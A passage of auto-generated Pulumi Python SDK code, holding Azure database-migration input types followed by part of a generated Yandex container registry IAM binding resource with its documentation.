The tier of the SKU, such as 'Free', 'Basic', 'Standard', or 'Premium'
"""
return pulumi.get(self, "tier")
@tier.setter
def tier(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "tier", value)
@pulumi.input_type
class SqlConnectionInfoArgs:
def __init__(__self__, *,
data_source: pulumi.Input[str],
type: pulumi.Input[str],
additional_settings: Optional[pulumi.Input[str]] = None,
authentication: Optional[pulumi.Input[Union[str, 'AuthenticationType']]] = None,
encrypt_connection: Optional[pulumi.Input[bool]] = None,
password: Optional[pulumi.Input[str]] = None,
platform: Optional[pulumi.Input[Union[str, 'SqlSourcePlatform']]] = None,
trust_server_certificate: Optional[pulumi.Input[bool]] = None,
user_name: Optional[pulumi.Input[str]] = None):
"""
Information for connecting to SQL database server
        :param pulumi.Input[str] data_source: Data source in the format Protocol:MachineName\\SQLServerInstanceName,PortNumber
:param pulumi.Input[str] type: Type of connection info
Expected value is 'SqlConnectionInfo'.
:param pulumi.Input[str] additional_settings: Additional connection settings
:param pulumi.Input[Union[str, 'AuthenticationType']] authentication: Authentication type to use for connection
:param pulumi.Input[bool] encrypt_connection: Whether to encrypt the connection
:param pulumi.Input[str] password: Password credential.
:param pulumi.Input[Union[str, 'SqlSourcePlatform']] platform: Server platform type for connection
:param pulumi.Input[bool] trust_server_certificate: Whether to trust the server certificate
:param pulumi.Input[str] user_name: User name
"""
pulumi.set(__self__, "data_source", data_source)
pulumi.set(__self__, "type", 'SqlConnectionInfo')
if additional_settings is not None:
pulumi.set(__self__, "additional_settings", additional_settings)
if authentication is not None:
pulumi.set(__self__, "authentication", authentication)
        if encrypt_connection is None:
            encrypt_connection = True
        pulumi.set(__self__, "encrypt_connection", encrypt_connection)
if password is not None:
pulumi.set(__self__, "password", password)
if platform is not None:
pulumi.set(__self__, "platform", platform)
        if trust_server_certificate is None:
            trust_server_certificate = False
        pulumi.set(__self__, "trust_server_certificate", trust_server_certificate)
if user_name is not None:
pulumi.set(__self__, "user_name", user_name)
@property
@pulumi.getter(name="dataSource")
def data_source(self) -> pulumi.Input[str]:
"""
        Data source in the format Protocol:MachineName\\SQLServerInstanceName,PortNumber
"""
return pulumi.get(self, "data_source")
@data_source.setter
def data_source(self, value: pulumi.Input[str]):
pulumi.set(self, "data_source", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of connection info
Expected value is 'SqlConnectionInfo'.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter(name="additionalSettings")
def additional_settings(self) -> Optional[pulumi.Input[str]]:
"""
Additional connection settings
"""
return pulumi.get(self, "additional_settings")
@additional_settings.setter
def additional_settings(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "additional_settings", value)
@property
@pulumi.getter
def authentication(self) -> Optional[pulumi.Input[Union[str, 'AuthenticationType']]]:
"""
Authentication type to use for connection
"""
return pulumi.get(self, "authentication")
@authentication.setter
def authentication(self, value: Optional[pulumi.Input[Union[str, 'AuthenticationType']]]):
pulumi.set(self, "authentication", value)
@property
@pulumi.getter(name="encryptConnection")
def encrypt_connection(self) -> Optional[pulumi.Input[bool]]:
"""
Whether to encrypt the connection
"""
return pulumi.get(self, "encrypt_connection")
@encrypt_connection.setter
def encrypt_connection(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "encrypt_connection", value)
@property
@pulumi.getter
def password(self) -> Optional[pulumi.Input[str]]:
"""
Password credential.
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "password", value)
@property
@pulumi.getter
def platform(self) -> Optional[pulumi.Input[Union[str, 'SqlSourcePlatform']]]:
"""
Server platform type for connection
"""
return pulumi.get(self, "platform")
@platform.setter
def platform(self, value: Optional[pulumi.Input[Union[str, 'SqlSourcePlatform']]]):
pulumi.set(self, "platform", value)
@property
@pulumi.getter(name="trustServerCertificate")
def trust_server_certificate(self) -> Optional[pulumi.Input[bool]]:
"""
Whether to trust the server certificate
"""
return pulumi.get(self, "trust_server_certificate")
@trust_server_certificate.setter
def trust_server_certificate(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "trust_server_certificate", value)
@property
@pulumi.getter(name="userName")
def user_name(self) -> Optional[pulumi.Input[str]]:
"""
User name
"""
return pulumi.get(self, "user_name")
@user_name.setter
def user_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "user_name", value)
@pulumi.input_type
class ValidateMigrationInputSqlServerSqlDbSyncTaskPropertiesArgs:
def __init__(__self__, *,
task_type: pulumi.Input[str],
input: Optional[pulumi.Input['ValidateSyncMigrationInputSqlServerTaskInputArgs']] = None):
"""
Properties for task that validates migration input for SQL to Azure SQL DB sync migrations
:param pulumi.Input[str] task_type: Task type.
Expected value is 'ValidateMigrationInput.SqlServer.SqlDb.Sync'.
:param pulumi.Input['ValidateSyncMigrationInputSqlServerTaskInputArgs'] input: Task input
"""
pulumi.set(__self__, "task_type", 'ValidateMigrationInput.SqlServer.SqlDb.Sync')
if input is not None:
pulumi.set(__self__, "input", input)
@property
@pulumi.getter(name="taskType")
def task_type(self) -> pulumi.Input[str]:
"""
Task type.
Expected value is 'ValidateMigrationInput.SqlServer.SqlDb.Sync'.
"""
return pulumi.get(self, "task_type")
@task_type.setter
def task_type(self, value: pulumi.Input[str]):
pulumi.set(self, "task_type", value)
@property
@pulumi.getter
def input(self) -> Optional[pulumi.Input['ValidateSyncMigrationInputSqlServerTaskInputArgs']]:
"""
Task input
"""
return pulumi.get(self, "input")
@input.setter
def input(self, value: Optional[pulumi.Input['ValidateSyncMigrationInputSqlServerTaskInputArgs']]):
pulumi.set(self, "input", value)
@pulumi.input_type
class ValidateMigrationInputSqlServerSqlMISyncTaskInputArgs:
def __init__(__self__, *,
azure_app: pulumi.Input['AzureActiveDirectoryAppArgs'],
selected_databases: pulumi.Input[Sequence[pulumi.Input['MigrateSqlServerSqlMIDatabaseInputArgs']]],
source_connection_info: pulumi.Input['SqlConnectionInfoArgs'],
storage_resource_id: pulumi.Input[str],
target_connection_info: pulumi.Input['MiSqlConnectionInfoArgs'],
backup_file_share: Optional[pulumi.Input['FileShareArgs']] = None):
"""
        Input for the task that validates migration input for SQL Server to Azure SQL Database Managed Instance online migrations.
:param pulumi.Input['AzureActiveDirectoryAppArgs'] azure_app: Azure Active Directory Application the DMS instance will use to connect to the target instance of Azure SQL Database Managed Instance and the Azure Storage Account
:param pulumi.Input[Sequence[pulumi.Input['MigrateSqlServerSqlMIDatabaseInputArgs']]] selected_databases: Databases to migrate
:param pulumi.Input['SqlConnectionInfoArgs'] source_connection_info: Connection information for source SQL Server
:param pulumi.Input[str] storage_resource_id: Fully qualified resourceId of storage
:param pulumi.Input['MiSqlConnectionInfoArgs'] target_connection_info: Connection information for Azure SQL Database Managed Instance
:param pulumi.Input['FileShareArgs'] backup_file_share: Backup file share information for all selected databases.
"""
pulumi.set(__self__, "azure_app", azure_app)
pulumi.set(__self__, "selected_databases", selected_databases)
pulumi.set(__self__, "source_connection_info", source_connection_info)
pulumi.set(__self__, "storage_resource_id", storage_resource_id)
pulumi.set(__self__, "target_connection_info", target_connection_info)
if backup_file_share is not None:
pulumi.set(__self__, "backup_file_share", backup_file_share)
@property
@pulumi.getter(name="azureApp")
def azure_app(self) -> pulumi.Input['AzureActiveDirectoryAppArgs']:
"""
Azure Active Directory Application the DMS instance will use to connect to the target instance of Azure SQL Database Managed Instance and the Azure Storage Account
"""
return pulumi.get(self, "azure_app")
@azure_app.setter
def azure_app(self, value: pulumi.Input['AzureActiveDirectoryAppArgs']):
pulumi.set(self, "azure_app", value)
@property
@pulumi.getter(name="selectedDatabases")
def selected_databases(self) -> pulumi.Input[Sequence[pulumi.Input['MigrateSqlServerSqlMIDatabaseInputArgs']]]:
"""
Databases to migrate
"""
return pulumi.get(self, "selected_databases")
@selected_databases.setter
def selected_databases(self, value: pulumi.Input[Sequence[pulumi.Input['MigrateSqlServerSqlMIDatabaseInputArgs']]]):
pulumi.set(self, "selected_databases", value)
@property
@pulumi.getter(name="sourceConnectionInfo")
def source_connection_info(self) -> pulumi.Input['SqlConnectionInfoArgs']:
"""
Connection information for source SQL Server
"""
return pulumi.get(self, "source_connection_info")
@source_connection_info.setter
def source_connection_info(self, value: pulumi.Input['SqlConnectionInfoArgs']):
pulumi.set(self, "source_connection_info", value)
@property
@pulumi.getter(name="storageResourceId")
def storage_resource_id(self) -> pulumi.Input[str]:
"""
Fully qualified resourceId of storage
"""
return pulumi.get(self, "storage_resource_id")
@storage_resource_id.setter
def storage_resource_id(self, value: pulumi.Input[str]):
pulumi.set(self, "storage_resource_id", value)
@property
@pulumi.getter(name="targetConnectionInfo")
def target_connection_info(self) -> pulumi.Input['MiSqlConnectionInfoArgs']:
"""
Connection information for Azure SQL Database Managed Instance
"""
return pulumi.get(self, "target_connection_info")
@target_connection_info.setter
def target_connection_info(self, value: pulumi.Input['MiSqlConnectionInfoArgs']):
pulumi.set(self, "target_connection_info", value)
@property
@pulumi.getter(name="backupFileShare")
def backup_file_share(self) -> Optional[pulumi.Input['FileShareArgs']]:
"""
Backup file share information for all selected databases.
"""
return pulumi.get(self, "backup_file_share")
@backup_file_share.setter
def backup_file_share(self, value: Optional[pulumi.Input['FileShareArgs']]):
pulumi.set(self, "backup_file_share", value)
@pulumi.input_type
class ValidateMigrationInputSqlServerSqlMISyncTaskPropertiesArgs:
def __init__(__self__, *,
task_type: pulumi.Input[str],
input: Optional[pulumi.Input['ValidateMigrationInputSqlServerSqlMISyncTaskInputArgs']] = None):
"""
Properties for task that validates migration input for SQL to Azure SQL Database Managed Instance sync scenario
:param pulumi.Input[str] task_type: Task type.
Expected value is 'ValidateMigrationInput.SqlServer.AzureSqlDbMI.Sync.LRS'.
:param pulumi.Input['ValidateMigrationInputSqlServerSqlMISyncTaskInputArgs'] input: Task input
"""
pulumi.set(__self__, "task_type", 'ValidateMigrationInput.SqlServer.AzureSqlDbMI.Sync.LRS')
if input is not None:
pulumi.set(__self__, "input", input)
@property
@pulumi.getter(name="taskType")
def task_type(self) -> pulumi.Input[str]:
"""
Task type.
Expected value is 'ValidateMigrationInput.SqlServer.AzureSqlDbMI.Sync.LRS'.
"""
return pulumi.get(self, "task_type")
@task_type.setter
def task_type(self, value: pulumi.Input[str]):
pulumi.set(self, "task_type", value)
@property
@pulumi.getter
def input(self) -> Optional[pulumi.Input['ValidateMigrationInputSqlServerSqlMISyncTaskInputArgs']]:
"""
Task input
"""
return pulumi.get(self, "input")
@input.setter
def input(self, value: Optional[pulumi.Input['ValidateMigrationInputSqlServerSqlMISyncTaskInputArgs']]):
pulumi.set(self, "input", value)
@pulumi.input_type
class ValidateMigrationInputSqlServerSqlMITaskInputArgs:
def __init__(__self__, *,
backup_blob_share: pulumi.Input['BlobShareArgs'],
selected_databases: pulumi.Input[Sequence[pulumi.Input['MigrateSqlServerSqlMIDatabaseInputArgs']]],
source_connection_info: pulumi.Input['SqlConnectionInfoArgs'],
target_connection_info: pulumi.Input['SqlConnectionInfoArgs'],
backup_file_share: Optional[pulumi.Input['FileShareArgs']] = None,
backup_mode: Optional[pulumi.Input[Union[str, 'BackupMode']]] = None,
selected_logins: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None):
"""
Input for task that validates migration input for SQL to Azure SQL Managed Instance
:param pulumi.Input['BlobShareArgs'] backup_blob_share: SAS URI of Azure Storage Account Container to be used for storing backup files.
:param pulumi.Input[Sequence[pulumi.Input['MigrateSqlServerSqlMIDatabaseInputArgs']]] selected_databases: Databases to migrate
:param pulumi.Input['SqlConnectionInfoArgs'] source_connection_info: Information for connecting to source
:param pulumi.Input['SqlConnectionInfoArgs'] target_connection_info: Information for connecting to target
:param pulumi.Input['FileShareArgs'] backup_file_share: Backup file share information for all selected databases.
:param pulumi.Input[Union[str, 'BackupMode']] backup_mode: Backup Mode to specify whether to use existing backup or create new backup.
:param pulumi.Input[Sequence[pulumi.Input[str]]] selected_logins: Logins to migrate
"""
pulumi.set(__self__, "backup_blob_share", backup_blob_share)
pulumi.set(__self__, "selected_databases", selected_databases)
pulumi.set(__self__, "source_connection_info", source_connection_info)
pulumi.set(__self__, "target_connection_info", target_connection_info)
if backup_file_share is not None:
pulumi.set(__self__, "backup_file_share", backup_file_share)
if backup_mode is not None:
pulumi.set(__self__, "backup_mode", backup_mode)
if selected_logins is not None:
pulumi.set(__self__, "selected_logins", selected_logins)
@property
@pulumi.getter(name="backupBlobShare")
def backup_blob_share(self) -> pulumi.Input['BlobShareArgs']:
"""
SAS URI of Azure Storage Account Container to be used for storing backup files.
"""
return pulumi.get(self, "backup_blob_share")
@backup_blob_share.setter
def backup_blob_share(self, value: pulumi.Input['BlobShareArgs']):
pulumi.set(self, "backup_blob_share", value)
@property
@pulumi.getter(name="selectedDatabases")
def selected_databases(self) -> pulumi.Input[Sequence[pulumi.Input['MigrateSqlServerSqlMIDatabaseInputArgs']]]:
"""
Databases to migrate
"""
return pulumi.get(self, "selected_databases")
@selected_databases.setter
def selected_databases(self, value: pulumi.Input[Sequence[pulumi.Input['MigrateSqlServerSqlMIDatabaseInputArgs']]]):
pulumi.set(self, "selected_databases", value)
@property
@pulumi.getter(name="sourceConnectionInfo")
def source_connection_info(self) -> pulumi.Input['SqlConnectionInfoArgs']:
"""
Information for connecting to source
"""
return pulumi.get(self, "source_connection_info")
@source_connection_info.setter
def source_connection_info(self, value: pulumi.Input['SqlConnectionInfoArgs']):
pulumi.set(self, "source_connection_info", value)
@property
@pulumi.getter(name="targetConnectionInfo")
def target_connection_info(self) -> pulumi.Input['SqlConnectionInfoArgs']:
"""
Information for connecting to target
"""
return pulumi.get(self, "target_connection_info")
@target_connection_info.setter
def target_connection_info(self, value: pulumi.Input['SqlConnectionInfoArgs']):
pulumi.set(self, "target_connection_info", value)
@property
@pulumi.getter(name="backupFileShare")
def backup_file_share(self) -> Optional[pulumi.Input['FileShareArgs']]:
"""
Backup file share information for all selected databases.
"""
return pulumi.get(self, "backup_file_share")
@backup_file_share.setter
def backup_file_share(self, value: Optional[pulumi.Input['FileShareArgs']]):
pulumi.set(self, "backup_file_share", value)
@property
@pulumi.getter(name="backupMode")
def backup_mode(self) -> Optional[pulumi.Input[Union[str, 'BackupMode']]]:
"""
Backup Mode to specify whether to use existing backup or create new backup.
"""
return pulumi.get(self, "backup_mode")
@backup_mode.setter
def backup_mode(self, value: Optional[pulumi.Input[Union[str, 'BackupMode']]]):
pulumi.set(self, "backup_mode", value)
@property
@pulumi.getter(name="selectedLogins")
def selected_logins(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
Logins to migrate
"""
return pulumi.get(self, "selected_logins")
@selected_logins.setter
def selected_logins(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "selected_logins", value)
@pulumi.input_type
class ValidateMigrationInputSqlServerSqlMITaskPropertiesArgs:
def __init__(__self__, *,
task_type: pulumi.Input[str],
input: Optional[pulumi.Input['ValidateMigrationInputSqlServerSqlMITaskInputArgs']] = None):
"""
Properties for task that validates migration input for SQL to Azure SQL Database Managed Instance
:param pulumi.Input[str] task_type: Task type.
Expected value is 'ValidateMigrationInput.SqlServer.AzureSqlDbMI'.
:param pulumi.Input['ValidateMigrationInputSqlServerSqlMITaskInputArgs'] input: Task input
"""
pulumi.set(__self__, "task_type", 'ValidateMigrationInput.SqlServer.AzureSqlDbMI')
if input is not None:
pulumi.set(__self__, "input", input)
@property
@pulumi.getter(name="taskType")
def task_type(self) -> pulumi.Input[str]:
"""
Task type.
Expected value is 'ValidateMigrationInput.SqlServer.AzureSqlDbMI'.
"""
return pulumi.get(self, "task_type")
@task_type.setter
def task_type(self, value: pulumi.Input[str]):
pulumi.set(self, "task_type", value)
@property
@pulumi.getter
def input(self) -> Optional[pulumi.Input['ValidateMigrationInputSqlServerSqlMITaskInputArgs']]:
"""
Task input
"""
return pulumi.get(self, "input")
@input.setter
def input(self, value: Optional[pulumi.Input['ValidateMigrationInputSqlServerSqlMITaskInputArgs']]):
pulumi.set(self, "input", value)
@pulumi.input_type
class ValidateSyncMigrationInputSqlServerTaskInputArgs:
def __init__(__self__, *,
selected_databases: pulumi.Input[Sequence[pulumi.Input['MigrateSqlServerSqlDbSyncDatabaseInputArgs']]],
source_connection_info: pulumi.Input['SqlConnectionInfoArgs'],
target_connection_info: pulumi.Input['SqlConnectionInfoArgs']):
"""
Input for task that validates migration input for SQL sync migrations
:param pulumi.Input[Sequence[pulumi.Input['MigrateSqlServerSqlDbSyncDatabaseInputArgs']]] selected_databases: Databases to migrate
:param pulumi.Input['SqlConnectionInfoArgs'] source_connection_info: Information for connecting to source SQL server
:param pulumi.Input['SqlConnectionInfoArgs'] target_connection_info: Information for connecting to target
"""
pulumi.set(__self__, "selected_databases", selected_databases)
pulumi.set(__self__, "source_connection_info", source_connection_info)
pulumi.set(__self__, "target_connection_info", target_connection_info)
@property
@pulumi.getter(name="selectedDatabases")
def selected_databases(self) -> pulumi.Input[Sequence[pulumi.Input['MigrateSqlServerSqlDbSyncDatabaseInputArgs']]]:
"""
Databases to migrate
"""
return pulumi.get(self, "selected_databases")
@selected_databases.setter
def selected_databases(self, value: pulumi.Input[Sequence[pulumi.Input['MigrateSqlServerSqlDbSyncDatabaseInputArgs']]]):
pulumi.set(self, "selected_databases", value)
@property
@pulumi.getter(name="sourceConnectionInfo")
def source_connection_info(self) -> pulumi.Input['SqlConnectionInfoArgs']:
"""
Information for connecting to source SQL server
"""
return pulumi.get(self, "source_connection_info")
@source_connection_info.setter
def source_connection_info(self, value: pulumi.Input['SqlConnectionInfoArgs']):
pulumi.set(self, "source_connection_info", value)
@property
@pulumi.getter(name="targetConnectionInfo")
def target_connection_info(self) -> pulumi.Input['SqlConnectionInfoArgs']:
"""
Information for connecting to target
"""
return pulumi.get(self, "target_connection_info")
@target_connection_info.setter
def target_connection_info(self, value: pulumi.Input['SqlConnectionInfoArgs']):
pulumi.set(self, "target_connection_info", value)
quality signals (for the file above): avg_line_length 41.554592 | max_line_length 395 | alphanum_fraction 0.681169 | 14,765 words | 138,917 chars | 3,342 lines

hexsha: c7578b2f4d12da0bb581f35282ca75c5732438a6 | size: 16,926 | ext: py | lang: Python
path: sdk/python/pulumi_yandex/container_registry_iam_binding.py
repo: pulumi/pulumi-yandex @ 559a0c82fd2b834bb5f1dc3abbf0dab689b13a3e
licenses: ["ECL-2.0", "Apache-2.0"]
stars: 9 (2021-04-20T15:39:41.000Z .. 2022-02-20T09:14:39.000Z) | issues: 56 (2021-04-20T11:31:03.000Z .. 2022-03-31T15:53:06.000Z) | forks: null
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities
__all__ = ['ContainerRegistryIamBindingArgs', 'ContainerRegistryIamBinding']
@pulumi.input_type
class ContainerRegistryIamBindingArgs:
def __init__(__self__, *,
members: pulumi.Input[Sequence[pulumi.Input[str]]],
registry_id: pulumi.Input[str],
role: pulumi.Input[str],
sleep_after: Optional[pulumi.Input[int]] = None):
"""
The set of arguments for constructing a ContainerRegistryIamBinding resource.
:param pulumi.Input[Sequence[pulumi.Input[str]]] members: Identities that will be granted the privilege in `role`.
Each entry can have one of the following values:
* **userAccount:{user_id}**: A unique user ID that represents a specific Yandex account.
* **serviceAccount:{service_account_id}**: A unique service account ID.
* **system:{allUsers|allAuthenticatedUsers}**: see [system groups](https://cloud.yandex.com/docs/iam/concepts/access-control/system-group)
:param pulumi.Input[str] registry_id: The [Yandex Container Registry](https://cloud.yandex.com/docs/container-registry/) ID to apply a binding to.
:param pulumi.Input[str] role: The role that should be applied. See [roles](https://cloud.yandex.com/docs/container-registry/security/).
"""
pulumi.set(__self__, "members", members)
pulumi.set(__self__, "registry_id", registry_id)
pulumi.set(__self__, "role", role)
if sleep_after is not None:
pulumi.set(__self__, "sleep_after", sleep_after)
@property
@pulumi.getter
def members(self) -> pulumi.Input[Sequence[pulumi.Input[str]]]:
"""
Identities that will be granted the privilege in `role`.
Each entry can have one of the following values:
* **userAccount:{user_id}**: A unique user ID that represents a specific Yandex account.
* **serviceAccount:{service_account_id}**: A unique service account ID.
* **system:{allUsers|allAuthenticatedUsers}**: see [system groups](https://cloud.yandex.com/docs/iam/concepts/access-control/system-group)
"""
return pulumi.get(self, "members")
@members.setter
def members(self, value: pulumi.Input[Sequence[pulumi.Input[str]]]):
pulumi.set(self, "members", value)
@property
@pulumi.getter(name="registryId")
def registry_id(self) -> pulumi.Input[str]:
"""
The [Yandex Container Registry](https://cloud.yandex.com/docs/container-registry/) ID to apply a binding to.
"""
return pulumi.get(self, "registry_id")
@registry_id.setter
def registry_id(self, value: pulumi.Input[str]):
pulumi.set(self, "registry_id", value)
@property
@pulumi.getter
def role(self) -> pulumi.Input[str]:
"""
The role that should be applied. See [roles](https://cloud.yandex.com/docs/container-registry/security/).
"""
return pulumi.get(self, "role")
@role.setter
def role(self, value: pulumi.Input[str]):
pulumi.set(self, "role", value)
@property
@pulumi.getter(name="sleepAfter")
def sleep_after(self) -> Optional[pulumi.Input[int]]:
return pulumi.get(self, "sleep_after")
@sleep_after.setter
def sleep_after(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "sleep_after", value)
@pulumi.input_type
class _ContainerRegistryIamBindingState:
def __init__(__self__, *,
members: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
registry_id: Optional[pulumi.Input[str]] = None,
role: Optional[pulumi.Input[str]] = None,
sleep_after: Optional[pulumi.Input[int]] = None):
"""
Input properties used for looking up and filtering ContainerRegistryIamBinding resources.
:param pulumi.Input[Sequence[pulumi.Input[str]]] members: Identities that will be granted the privilege in `role`.
Each entry can have one of the following values:
* **userAccount:{user_id}**: A unique user ID that represents a specific Yandex account.
* **serviceAccount:{service_account_id}**: A unique service account ID.
* **system:{allUsers|allAuthenticatedUsers}**: see [system groups](https://cloud.yandex.com/docs/iam/concepts/access-control/system-group)
:param pulumi.Input[str] registry_id: The [Yandex Container Registry](https://cloud.yandex.com/docs/container-registry/) ID to apply a binding to.
:param pulumi.Input[str] role: The role that should be applied. See [roles](https://cloud.yandex.com/docs/container-registry/security/).
"""
if members is not None:
pulumi.set(__self__, "members", members)
if registry_id is not None:
pulumi.set(__self__, "registry_id", registry_id)
if role is not None:
pulumi.set(__self__, "role", role)
if sleep_after is not None:
pulumi.set(__self__, "sleep_after", sleep_after)
@property
@pulumi.getter
def members(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
Identities that will be granted the privilege in `role`.
Each entry can have one of the following values:
* **userAccount:{user_id}**: A unique user ID that represents a specific Yandex account.
* **serviceAccount:{service_account_id}**: A unique service account ID.
* **system:{allUsers|allAuthenticatedUsers}**: see [system groups](https://cloud.yandex.com/docs/iam/concepts/access-control/system-group)
"""
return pulumi.get(self, "members")
@members.setter
def members(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "members", value)
@property
@pulumi.getter(name="registryId")
def registry_id(self) -> Optional[pulumi.Input[str]]:
"""
The [Yandex Container Registry](https://cloud.yandex.com/docs/container-registry/) ID to apply a binding to.
"""
return pulumi.get(self, "registry_id")
@registry_id.setter
def registry_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "registry_id", value)
@property
@pulumi.getter
def role(self) -> Optional[pulumi.Input[str]]:
"""
The role that should be applied. See [roles](https://cloud.yandex.com/docs/container-registry/security/).
"""
return pulumi.get(self, "role")
@role.setter
def role(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "role", value)
@property
@pulumi.getter(name="sleepAfter")
def sleep_after(self) -> Optional[pulumi.Input[int]]:
return pulumi.get(self, "sleep_after")
@sleep_after.setter
def sleep_after(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "sleep_after", value)
class ContainerRegistryIamBinding(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
members: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
registry_id: Optional[pulumi.Input[str]] = None,
role: Optional[pulumi.Input[str]] = None,
sleep_after: Optional[pulumi.Input[int]] = None,
__props__=None):
"""
## yandex\_container\_registry\_iam\_binding
Allows creation and management of a single binding within IAM policy for
an existing Yandex Container Registry.
## Example Usage
```python
import pulumi
import pulumi_yandex as yandex
your_registry = yandex.ContainerRegistry("your-registry", folder_id="your-folder-id")
puller = yandex.ContainerRegistryIamBinding("puller",
registry_id=your_registry.id,
role="container-registry.images.puller",
members=["system:allUsers"])
```
## Import
IAM binding imports use space-delimited identifiers; first the resource in question and then the role. These bindings can be imported using the `registry_id` and role, e.g.
```sh
$ pulumi import yandex:index/containerRegistryIamBinding:ContainerRegistryIamBinding puller "registry_id container-registry.images.puller"
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[Sequence[pulumi.Input[str]]] members: Identities that will be granted the privilege in `role`.
Each entry can have one of the following values:
* **userAccount:{user_id}**: A unique user ID that represents a specific Yandex account.
* **serviceAccount:{service_account_id}**: A unique service account ID.
* **system:{allUsers|allAuthenticatedUsers}**: see [system groups](https://cloud.yandex.com/docs/iam/concepts/access-control/system-group)
:param pulumi.Input[str] registry_id: The [Yandex Container Registry](https://cloud.yandex.com/docs/container-registry/) ID to apply a binding to.
:param pulumi.Input[str] role: The role that should be applied. See [roles](https://cloud.yandex.com/docs/container-registry/security/).
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: ContainerRegistryIamBindingArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
## yandex\_container\_registry\_iam\_binding
Allows creation and management of a single binding within IAM policy for
an existing Yandex Container Registry.
## Example Usage
```python
import pulumi
import pulumi_yandex as yandex
your_registry = yandex.ContainerRegistry("your-registry", folder_id="your-folder-id")
puller = yandex.ContainerRegistryIamBinding("puller",
registry_id=your_registry.id,
role="container-registry.images.puller",
members=["system:allUsers"])
```
## Import
IAM binding imports use space-delimited identifiers; first the resource in question and then the role. These bindings can be imported using the `registry_id` and role, e.g.
```sh
$ pulumi import yandex:index/containerRegistryIamBinding:ContainerRegistryIamBinding puller "registry_id container-registry.images.puller"
```
:param str resource_name: The name of the resource.
:param ContainerRegistryIamBindingArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(ContainerRegistryIamBindingArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
members: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
registry_id: Optional[pulumi.Input[str]] = None,
role: Optional[pulumi.Input[str]] = None,
sleep_after: Optional[pulumi.Input[int]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = ContainerRegistryIamBindingArgs.__new__(ContainerRegistryIamBindingArgs)
if members is None and not opts.urn:
raise TypeError("Missing required property 'members'")
__props__.__dict__["members"] = members
if registry_id is None and not opts.urn:
raise TypeError("Missing required property 'registry_id'")
__props__.__dict__["registry_id"] = registry_id
if role is None and not opts.urn:
raise TypeError("Missing required property 'role'")
__props__.__dict__["role"] = role
__props__.__dict__["sleep_after"] = sleep_after
super(ContainerRegistryIamBinding, __self__).__init__(
'yandex:index/containerRegistryIamBinding:ContainerRegistryIamBinding',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
members: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
registry_id: Optional[pulumi.Input[str]] = None,
role: Optional[pulumi.Input[str]] = None,
sleep_after: Optional[pulumi.Input[int]] = None) -> 'ContainerRegistryIamBinding':
"""
Get an existing ContainerRegistryIamBinding resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[Sequence[pulumi.Input[str]]] members: Identities that will be granted the privilege in `role`.
Each entry can have one of the following values:
* **userAccount:{user_id}**: A unique user ID that represents a specific Yandex account.
* **serviceAccount:{service_account_id}**: A unique service account ID.
* **system:{allUsers|allAuthenticatedUsers}**: see [system groups](https://cloud.yandex.com/docs/iam/concepts/access-control/system-group)
:param pulumi.Input[str] registry_id: The [Yandex Container Registry](https://cloud.yandex.com/docs/container-registry/) ID to apply a binding to.
:param pulumi.Input[str] role: The role that should be applied. See [roles](https://cloud.yandex.com/docs/container-registry/security/).
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _ContainerRegistryIamBindingState.__new__(_ContainerRegistryIamBindingState)
__props__.__dict__["members"] = members
__props__.__dict__["registry_id"] = registry_id
__props__.__dict__["role"] = role
__props__.__dict__["sleep_after"] = sleep_after
return ContainerRegistryIamBinding(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
